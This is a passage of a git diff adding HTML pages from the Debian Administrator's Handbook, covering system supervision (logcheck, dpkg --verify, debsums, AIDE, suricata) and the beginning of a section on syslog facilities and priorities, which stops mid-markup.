+            href="sect.firewall-packet-filtering.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apparmor.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.supervision"></a>14.3. Supervision: Prevention, Detection, Deterrence</h2></div></div></div><a
+          id="id-1.17.6.2"
+          class="indexterm"></a><div
+          class="para">
+			Monitoring is an integral part of any security policy for several reasons. Among them, that the goal of security is usually not restricted to guaranteeing data confidentiality, but it also includes ensuring availability of the services. It is therefore imperative to check that everything works as expected, and to detect in a timely manner any deviant behavior or change in quality of the service(s) rendered. Monitoring activity can help detecting intrusion attempts and enable a swift reaction before they cause grave consequences. This section reviews some tools that can be used to monitor several aspects of a Debian system. As such, it completes <a
+            class="xref"
+            href="sect.monitoring.html">12.4 – „Monitoring“</a>.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.logcheck"></a>14.3.1. Monitoring Logs with <code
+                    class="command">logcheck</code></h3></div></div></div><a
+            id="id-1.17.6.4.2"
+            class="indexterm"></a><a
+            id="id-1.17.6.4.3"
+            class="indexterm"></a><a
+            id="id-1.17.6.4.4"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="command">logcheck</code> program monitors log files every hour by default. It sends unusual log messages in emails to the administrator for further analysis.
+			</div><div
+            class="para">
+				The list of monitored files is stored in <code
+              class="filename">/etc/logcheck/logcheck.logfiles</code>; the default values work fine if the <code
+              class="filename">/etc/rsyslog.conf</code> file has not been completely overhauled.
+			</div><div
+            class="para">
+				<code
+              class="command">logcheck</code> can work in one of three more or less detailed modes: <span
+              class="emphasis"><em>paranoid</em></span>, <span
+              class="emphasis"><em>server</em></span> and <span
+              class="emphasis"><em>workstation</em></span>. The first one is <span
+              class="emphasis"><em>very</em></span> verbose, and should probably be restricted to specific servers such as firewalls. The second (and default) mode is recommended for most servers. The last one is designed for workstations, and is even terser (it filters out more messages).
+			</div><div
+            class="para">
+				In all three cases, <code
+              class="command">logcheck</code> should probably be customized to exclude some extra messages (depending on installed services), unless the admin really wishes to receive hourly batches of long uninteresting emails. Since the message selection mechanism is rather complex, <code
+              class="filename">/usr/share/doc/logcheck-database/README.logcheck-database.gz</code> is a required — if challenging — read.
+			</div><div
+            class="para">
+				The applied rules can be split into several types:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						those that qualify a message as a cracking attempt (stored in a file in the <code
+                    class="filename">/etc/logcheck/cracking.d/</code> directory);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						those canceling such a qualification (<code
+                    class="filename">/etc/logcheck/cracking.ignore.d/</code>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						those classifying a message as a security alert (<code
+                    class="filename">/etc/logcheck/violations.d/</code>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						those canceling this classification (<code
+                    class="filename">/etc/logcheck/violations.ignore.d/</code>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						finally, those applying to the remaining messages (considered as <span
+                    class="emphasis"><em>system events</em></span>).
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Ignoring a message</strong></p></div></div></div><div
+              class="para">
+				Any message tagged as a cracking attempt or a security alert (following a rule stored in a <code
+                class="filename">/etc/logcheck/violations.d/myfile</code> file) can only be ignored by a rule in a <code
+                class="filename">/etc/logcheck/violations.ignore.d/myfile</code> or <code
+                class="filename">/etc/logcheck/violations.ignore.d/myfile-<em
+                  class="replaceable">extension</em></code> file.
+			</div></div><div
+            class="para">
+				A system event is always signaled unless a rule in one of the <code
+              class="filename">/etc/logcheck/ignore.d.{paranoid,server,workstation}/</code> directories states the event should be ignored. Of course, the only directories taken into account are those corresponding to verbosity levels equal or greater than the selected operation mode.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.monitoring-activity"></a>14.3.2. Monitoring Activity</h3></div></div></div><a
+            id="id-1.17.6.5.2"
+            class="indexterm"></a><a
+            id="id-1.17.6.5.3"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.real-time-monitoring"></a>14.3.2.1. In Real Time</h4></div></div></div><div
+              class="para">
+					<code
+                class="command">top</code> is an interactive tool that displays a list of currently running processes. The default sorting is based on the current amount of processor use and can be obtained with the <span
+                class="keycap"><strong>P</strong></span> key. Other sort orders include a sort by occupied memory (<span
+                class="keycap"><strong>M</strong></span> key), by total processor time (<span
+                class="keycap"><strong>T</strong></span> key) and by process identifier (<span
+                class="keycap"><strong>N</strong></span> key). The <span
+                class="keycap"><strong>k</strong></span> key allows killing a process by entering its process identifier. The <span
+                class="keycap"><strong>r</strong></span> key allows <span
+                class="emphasis"><em>renicing</em></span> a process, i.e. changing its priority.
+				</div><a
+              id="id-1.17.6.5.4.3"
+              class="indexterm"></a><div
+              class="para">
+					When the system seems to be overloaded, <code
+                class="command">top</code> is a great tool to see which processes are competing for processor time or consume too much memory. In particular, it is often interesting to check if the processes consuming resources match the real services that the machine is known to host. An unknown process running as the www-data user should really stand out and be investigated, since it's probably an instance of software installed and executed on the system through a vulnerability in a web application.
+				</div><div
+              class="para">
+					<code
+                class="command">top</code> is a very flexible tool and its manual page gives details on how to customize its display and adapt it to one's personal needs and habits.
+				</div><div
+              class="para">
+					The <code
+                class="command">gnome-system-monitor</code> graphical tool is similar to <code
+                class="command">top</code> and it provides roughly the same features.
+				</div><a
+              id="id-1.17.6.5.4.7"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.monitoring-history"></a>14.3.2.2. History</h4></div></div></div><a
+              id="id-1.17.6.5.5.2"
+              class="indexterm"></a><div
+              class="para">
+					Processor load, network traffic and free disk space are information that are constantly varying. Keeping a history of their evolution is often useful in determining exactly how the computer is used.
+				</div><a
+              id="id-1.17.6.5.5.4"
+              class="indexterm"></a><a
+              id="id-1.17.6.5.5.5"
+              class="indexterm"></a><div
+              class="para">
+					There are many dedicated tools for this task. Most can fetch data via SNMP (<span
+                class="emphasis"><em>Simple Network Management Protocol</em></span>) in order to centralize this information. An added benefit is that this allows fetching data from network elements that may not be general-purpose computers, such as dedicated network routers or switches.
+				</div><div
+              class="para">
+					This book deals with Munin in some detail (see <a
+                class="xref"
+                href="sect.monitoring.html#sect.munin">12.4.1 – „Setting Up Munin“</a>) as part of <a
+                class="xref"
+                href="advanced-administration.html">12: „<em>Advanced Administration</em>“</a>. Debian also provides a similar tool, <span
+                class="pkg pkg">cacti</span>. Its deployment is slightly more complex, since it is based solely on SNMP. Despite having a web interface, grasping the concepts involved in configuration still requires some effort. Reading the HTML documentation (<code
+                class="filename">/usr/share/doc/cacti/html/index.html</code>) should be considered a prerequisite.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> <code
+                          class="command">mrtg</code></strong></p></div></div></div><a
+                id="id-1.17.6.5.5.8.2"
+                class="indexterm"></a><div
+                class="para">
+					<code
+                  class="command">mrtg</code> (in the similarly-named package) is an older tool. Despite some rough edges, it can aggregate historical data and display them as graphs. It includes a number of scripts dedicated to collecting the most commonly monitored data such as processor load, network traffic, web page hits, and so on.
+				</div><div
+                class="para">
+					The <span
+                  class="pkg pkg">mrtg-contrib</span> and <span
+                  class="pkg pkg">mrtgutils</span> packages contain example scripts that can be used directly.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.6.6"></a>14.3.3. Detecting Changes</h3></div></div></div><div
+            class="para">
+				Once the system is installed and configured, and barring security upgrades, there's usually no reason for most of the files and directories to evolve, data excepted. It is therefore interesting to make sure that files actually do not change: any unexpected change would therefore be worth investigating. This section presents a few tools able to monitor files and to warn the administrator when an unexpected change occurs (or simply to list such changes).
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.dpkg-verify"></a>14.3.3.1. Auditing Packages with <code
+                      class="command">dpkg --verify</code></h4></div></div></div><a
+              id="id-1.17.6.6.3.2"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Protecting against upstream changes</strong></p></div></div></div><div
+                class="para">
+					<code
+                  class="command">dpkg --verify</code> is useful in detecting changes to files coming from a Debian package, but it will be useless if the package itself is compromised, for instance if the Debian mirror is compromised. Protecting against this class of attacks involves using APT's digital signature verification system (see <a
+                  class="xref"
+                  href="sect.package-authentication.html">6.5 – „Checking Package Authenticity“</a>), and taking care to only install packages from a certified origin.
+				</div></div><div
+              class="para">
+					<code
+                class="command">dpkg --verify</code> (or <code
+                class="command">dpkg -V</code>) is an interesting tool since it allows finding what installed files have been modified (potentially by an attacker), but this should be taken with a grain of salt. To do its job it relies on checksums stored in dpkg's own database which is stored on the hard disk (they can be found in <code
+                class="filename">/var/lib/dpkg/info/<em
+                  class="replaceable">package</em>.md5sums</code>); a thorough attacker will therefore update these files so they contain the new checksums for the subverted files.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> File fingerprint</strong></p></div></div></div><a
+                id="id-1.17.6.6.3.5.2"
+                class="indexterm"></a><a
+                id="id-1.17.6.6.3.5.3"
+                class="indexterm"></a><a
+                id="id-1.17.6.6.3.5.4"
+                class="indexterm"></a><a
+                id="id-1.17.6.6.3.5.5"
+                class="indexterm"></a><div
+                class="para">
+					As a reminder: a fingerprint is a value, often a number (even though in hexadecimal notation), that contains a kind of signature for the contents of a file. This signature is calculated with an algorithm (MD5 or SHA1 being well-known examples) that more or less guarantee that even the tiniest change in the file contents implies a change in the fingerprint; this is known as the “avalanche effect”. This allows a simple numerical fingerprint to serve as a litmus test to check whether the contents of a file have been altered. These algorithms are not reversible; in other words, for most of them, knowing a fingerprint doesn't allow finding the corresponding contents. Recent mathematical advances seem to weaken the absoluteness of these principles, but their use is not called into question so far, since creating different contents yielding the same fingerprint still seems to be quite a difficult task.
+				</div></div><div
+              class="para">
+					Running <code
+                class="command">dpkg -V</code> will verify all installed packages and will print out a line for each file with a failing test. The output format is the same as the one of <code
+                class="command">rpm -V</code> where each character denotes a test on some specific meta-data. Unfortunately <code
+                class="command">dpkg</code> does not store the meta-data needed for most tests and will thus output question marks for them. Currently only the checksum test can yield a "5" on the third character (when it fails).
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg -V</code></strong>
+<code
+                class="computeroutput">??5??????   /lib/systemd/system/ssh.service
+??5?????? c /etc/libvirt/qemu/networks/default.xml
+??5?????? c /etc/lvm/lvm.conf
+??5?????? c /etc/salt/roster</code></pre><div
+              class="para">
+					In the sample above, dpkg reports a change to SSH's service file that the administrator made to the packaged file instead of using an appropriate <code
+                class="filename">/etc/systemd/system/ssh.service</code> override (which would be stored below <code
+                class="filename">/etc</code> like any configuration change should be). It also lists multiple configuration files (identified by the "c" letter on the second field) that had been legitimately modified.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.debsums"></a>14.3.3.2. Auditing Packages: <code
+                      class="command">debsums</code> and its Limits</h4></div></div></div><a
+              id="id-1.17.6.6.4.2"
+              class="indexterm"></a><div
+              class="para">
+					<code
+                class="command">debsums</code> is the ancestor of <code
+                class="command">dpkg -V</code> and is thus mostly obsolete. It suffers from the same limitations than dpkg. Fortunately, some of the limitations can be worked-around (whereas dpkg does not offer similar work-arounds).
+				</div><div
+              class="para">
+					Since the data on the disk cannot be trusted, <code
+                class="command">debsums</code> offers to do its checks based on <code
+                class="filename">.deb</code> files instead of relying on dpkg's database. To download trusted <code
+                class="filename">.deb</code> files of all the packages installed, we can rely on APT's authenticated downloads. This operation can be slow and tedious, and should therefore not be considered a proactive technique to be used on a regular basis.
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>apt-get --reinstall -d install `grep-status -e 'Status: install ok installed' -n -s Package`</code></strong>
+<code
+                class="computeroutput">[ ... ]
+# </code><strong
+                class="userinput"><code>debsums -p /var/cache/apt/archives --generate=all</code></strong></pre><div
+              class="para">
+					Note that this example uses the <code
+                class="command">grep-status</code> command from the <span
+                class="pkg pkg">dctrl-tools</span> package, which is not installed by default.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.6.6.5"></a>14.3.3.3. Monitoring Files: AIDE</h4></div></div></div><a
+              id="id-1.17.6.6.5.2"
+              class="indexterm"></a><div
+              class="para">
+					The AIDE tool (<span
+                class="emphasis"><em>Advanced Intrusion Detection Environment</em></span>) allows checking file integrity, and detecting any change against a previously recorded image of the valid system. This image is stored as a database (<code
+                class="filename">/var/lib/aide/aide.db</code>) containing the relevant information on all files of the system (fingerprints, permissions, timestamps and so on). This database is first initialized with <code
+                class="command">aideinit</code>; it is then used daily (by the <code
+                class="filename">/etc/cron.daily/aide</code> script) to check that nothing relevant changed. When changes are detected, AIDE records them in log files (<code
+                class="filename">/var/log/aide/*.log</code>) and sends its findings to the administrator by email.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Protecting the database</strong></p></div></div></div><div
+                class="para">
+					Since AIDE uses a local database to compare the states of the files, the validity of its results is directly linked to the validity of the database. If an attacker gets root permissions on a compromised system, they will be able to replace the database and cover their tracks. A possible workaround would be to store the reference data on read-only storage media.
+				</div></div><div
+              class="para">
+					Many options in <code
+                class="filename">/etc/default/aide</code> can be used to tweak the behavior of the <span
+                class="pkg pkg">aide</span> package. The AIDE configuration proper is stored in <code
+                class="filename">/etc/aide/aide.conf</code> and <code
+                class="filename">/etc/aide/aide.conf.d/</code> (actually, these files are only used by <code
+                class="command">update-aide.conf</code> to generate <code
+                class="filename">/var/lib/aide/aide.conf.autogenerated</code>). Configuration indicates which properties of which files need to be checked. For instance, the contents of log files changes routinely, and such changes can be ignored as long as the permissions of these files stay the same, but both contents and permissions of executable programs must be constant. Although not very complex, the configuration syntax is not fully intuitive, and reading the <span
+                class="citerefentry"><span
+                  class="refentrytitle">aide.conf</span>(5)</span> manual page is therefore recommended.
+				</div><div
+              class="para">
+					A new version of the database is generated daily in <code
+                class="filename">/var/lib/aide/aide.db.new</code>; if all recorded changes were legitimate, it can be used to replace the reference database.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> Tripwire and Samhain</strong></p></div></div></div><div
+                class="para">
+					Tripwire is very similar to AIDE; even the configuration file syntax is almost the same. The main addition provided by <span
+                  class="pkg pkg">tripwire</span> is a mechanism to sign the configuration file, so that an attacker cannot make it point at a different version of the reference database.
+				</div><div
+                class="para">
+					Samhain also offers similar features, as well as some functions to help detecting rootkits (see the sidebar <a
+                  class="xref"
+                  href="sect.supervision.html#sidebar.the-checksecurity-and-chkrootkit-rkhunter-packages"><span
+                    class="emphasis"><em>QUICK LOOK</em></span> The <span
+                    class="pkg pkg">checksecurity</span> and <span
+                    class="pkg pkg">chkrootkit</span>/<span
+                    class="pkg pkg">rkhunter</span> packages</a>). It can also be deployed globally on a network, and record its traces on a central server (with a signature).
+				</div></div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.the-checksecurity-and-chkrootkit-rkhunter-packages"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>QUICK LOOK</em></span> The <span
+                          class="pkg pkg">checksecurity</span> and <span
+                          class="pkg pkg">chkrootkit</span>/<span
+                          class="pkg pkg">rkhunter</span> packages</strong></p></div></div></div><a
+                id="id-1.17.6.6.5.8.2"
+                class="indexterm"></a><div
+                class="para">
+					The first of these packages contains several small scripts performing basic checks on the system (empty passwords, new setuid files, and so on) and warning the administrator if required. Despite its explicit name, an administrator should not rely solely on it to make sure a Linux system is secure.
+				</div><div
+                class="para">
+					The <span
+                  class="pkg pkg">chkrootkit</span> and <span
+                  class="pkg pkg">rkhunter</span> packages allow looking for <span
+                  class="emphasis"><em>rootkits</em></span> potentially installed on the system. As a reminder, these are pieces of software designed to hide the compromise of a system while discreetly keeping control of the machine. The tests are not 100% reliable, but they can usually draw the administrator's attention to potential problems.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.intrusion-detection"></a>14.3.4. Detecting Intrusion (IDS/NIDS)</h3></div></div></div><a
+            id="id-1.17.6.7.2"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.3"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.4"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.5"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.6"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.7"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Denial of service</strong></p></div></div></div><a
+              id="id-1.17.6.7.8.2"
+              class="indexterm"></a><div
+              class="para">
+				A “denial of service” attack has only one goal: to make a service unavailable. Whether such an attack involves overloading the server with queries or exploiting a bug, the end result is the same: the service is no longer operational. Regular users are unhappy, and the entity hosting the targeted network service suffers a loss in reputation (and possibly in revenue, for instance if the service was an e-commerce site).
+			</div><div
+              class="para">
+				Such an attack is sometimes “distributed”; this usually involves overloading the server with large numbers of queries coming from many different sources so that the server becomes unable to answer the legitimate queries. These types of attacks have gained well-known acronyms: <acronym
+                class="acronym">DDoS</acronym> and <acronym
+                class="acronym">DoS</acronym> (depending on whether the denial of service attack is distributed or not).
+			</div></div><div
+            class="para">
+				<code
+              class="command">suricata</code> (in the Debian package of the same name) is a NIDS — a <span
+              class="emphasis"><em>Network Intrusion Detection System</em></span>. Its function is to listen to the network and try to detect infiltration attempts and/or hostile acts (including denial of service attacks). All these events are logged in multiple files in <code
+              class="filename">/var/log/suricata</code>. There are third party tools (Kibana/logstash) to better browse all the data collected. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://suricata-ids.org">http://suricata-ids.org</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.elastic.co/products/kibana">https://www.elastic.co/products/kibana</a></div>
+			</div><a
+            id="id-1.17.6.7.10"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.11"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Range of action</strong></p></div></div></div><div
+              class="para">
+				The effectiveness of <code
+                class="command">suricata</code> is limited by the traffic seen on the monitored network interface. It will obviously not be able to detect anything if it cannot observe the real traffic. When plugged into a network switch, it will therefore only monitor attacks targeting the machine it runs on, which is probably not the intention. The machine hosting <code
+                class="command">suricata</code> should therefore be plugged into the “mirror” port of the switch, which is usually dedicated to chaining switches and therefore gets all the traffic.
+			</div></div><div
+            class="para">
+				Configuring suricata involves reviewing and editing <code
+              class="filename">/etc/suricata/suricata-debian.yaml</code>, which is very long because each parameter is abundantly commented. A minimal configuration requires describing the range of addresses that the local network covers (<code
+              class="literal">HOME_NET</code> parameter). In practice, this means the set of all potential attack targets. But getting the most of it requires reading it in full and adapting it to the local situation.
+			</div><div
+            class="para">
+				On top of this, you should also edit <code
+              class="filename">/etc/default/suricata</code> to define the network interface to monitor and to enable the init script (by setting <code
+              class="literal">RUN=yes</code>). You might also want to set <code
+              class="literal">LISTENMODE=pcap</code> because the default <code
+              class="literal">LISTENMODE=nfqueue</code> requires further configuration to work properly (the netfilter firewall must be configured to pass packets to some user-space queue handled by suricata via the <code
+              class="literal">NFQUEUE</code> target).
+			</div><div
+            class="para">
+				To detect bad behaviour, <code
+              class="command">suricata</code> needs a set of monitoring rules: you can find such rules in the <span
+              class="pkg pkg">snort-rules-default</span> package. <code
+              class="command">snort</code> is the historical reference in the IDS ecosystem and <code
+              class="command">suricata</code> is able to reuse rules written for it. Unfortunately that package is missing from <span
+              class="distribution distribution">Debian Jessie</span> and should be retrieved from another Debian release like <span
+              class="distribution distribution">Testing</span> or <span
+              class="distribution distribution">Unstable</span>.
+			</div><div
+            class="para">
+				Alternatively, <code
+              class="command">oinkmaster</code> (in the package of the same name) can be used to download Snort rulesets from external sources.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Integration with <code
+                        class="command">prelude</code></strong></p></div></div></div><div
+              class="para">
+				Prelude brings centralized monitoring of security information. Its modular architecture includes a server (the <span
+                class="emphasis"><em>manager</em></span> in <span
+                class="pkg pkg">prelude-manager</span>) which gathers alerts generated by <span
+                class="emphasis"><em>sensors</em></span> of various types.
+			</div><div
+              class="para">
+				Suricata can be configured as such a sensor. Other possibilities include <span
+                class="emphasis"><em>prelude-lml</em></span> (<span
+                class="emphasis"><em>Log Monitor Lackey</em></span>) which monitors log files (in a manner similar to <code
+                class="command">logcheck</code>, described in <a
+                class="xref"
+                href="sect.supervision.html#sect.logcheck">14.3.1 – „Monitoring Logs with <code
+                  class="command">logcheck</code>“</a>).
+			</div><a
+              id="id-1.17.6.7.17.4"
+              class="indexterm"></a></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.firewall-packet-filtering.html"><strong>Předcházející</strong>14.2. Firewall or Packet Filtering</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apparmor.html"><strong>Další</strong>14.4. Introduction to AppArmor</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.syslog.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.syslog.html
new file mode 100644
index 000000000..aa70f4583
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.syslog.html
@@ -0,0 +1,331 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.5. syslog System Events</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.administration-interfaces.html"
+        title="9.4. Administration Interfaces" /><link
+        rel="next"
+        href="sect.inetd.html"
+        title="9.6. The inetd Super-Server" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.syslog.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.administration-interfaces.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.inetd.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.syslog"></a>9.5. <code
+                  class="command">syslog</code> System Events</h2></div></div></div><a
+          id="id-1.12.8.2"
+          class="indexterm"></a><a
+          id="id-1.12.8.3"
+          class="indexterm"></a><a
+          id="id-1.12.8.4"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.syslog-principe"></a>9.5.1. Principle and Mechanism</h3></div></div></div><div
+            class="para">
+				The <code
+              class="command">rsyslogd</code> daemon is responsible for collecting service messages coming from applications and the kernel, then dispatching them into log files (usually stored in the <code
+              class="filename">/var/log/</code> directory). It obeys the <code
+              class="filename">/etc/rsyslog.conf</code> configuration file.
+			</div><div
+            class="para">
+				Each log message is associated with an application subsystem (called “facility” in the documentation):
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">auth</code> and <code
+                    class="literal">authpriv</code>: for authentication;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">cron</code>: comes from task scheduling services, <code
+                    class="command">cron</code> and <code
+                    class="command">atd</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">daemon</code>: affects a daemon without any special classification (DNS, NTP, etc.);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ftp</code>: concerns the FTP server;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">kern</code>: message coming from the kernel;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">lpr</code>: comes from the printing subsystem;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">mail</code>: comes from the e-mail subsystem;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">news</code>: Usenet subsystem message (especially from an NNTP — Network News Transfer Protocol — server that manages newsgroups);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">syslog</code>: messages from the <code
+                    class="command">syslogd</code> server, itself;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">user</code>: user messages (generic);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">uucp</code>: messages from the UUCP server (Unix to Unix Copy Program, an old protocol notably used to distribute e-mail messages);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">local0</code> to <code
+                    class="literal">local7</code>: reserved for local use.
+					</div></li></ul></div><div
+            class="para">
+				Each message is also associated with a priority level. Here is the list in decreasing order:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">emerg</code>: “Help!” There is an emergency, the system is probably unusable.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">alert</code>: hurry up, any delay can be dangerous, action must be taken immediately;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">crit</code>: conditions are critical;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">err</code>: error;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">warn</code>: warning (potential error);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">notice</code>: conditions are normal, but the message is important;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">info</code>: informative message;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">debug</code>: debugging message.
+					</div></li></ul></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.syslog-config"></a>9.5.2. The Configuration File</h3></div></div></div><div
+            class="para">
+				The syntax of the <code
+              class="filename">/etc/rsyslog.conf</code> file is detailed in the <span
+              class="citerefentry"><span
+                class="refentrytitle">rsyslog.conf</span>(5)</span> manual page, but there is also HTML documentation available in the <span
+              class="pkg pkg">rsyslog-doc</span> package (<code
+              class="filename">/usr/share/doc/rsyslog-doc/html/index.html</code>). The overall principle is to write “selector” and “action” pairs. The selector defines all relevant messages, and the actions describes how to deal with them.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.syslog-selector-syntax"></a>9.5.2.1. Syntax of the Selector</h4></div></div></div><div
+              class="para">
+					The selector is a semicolon-separated list of <code
+                class="literal"><em
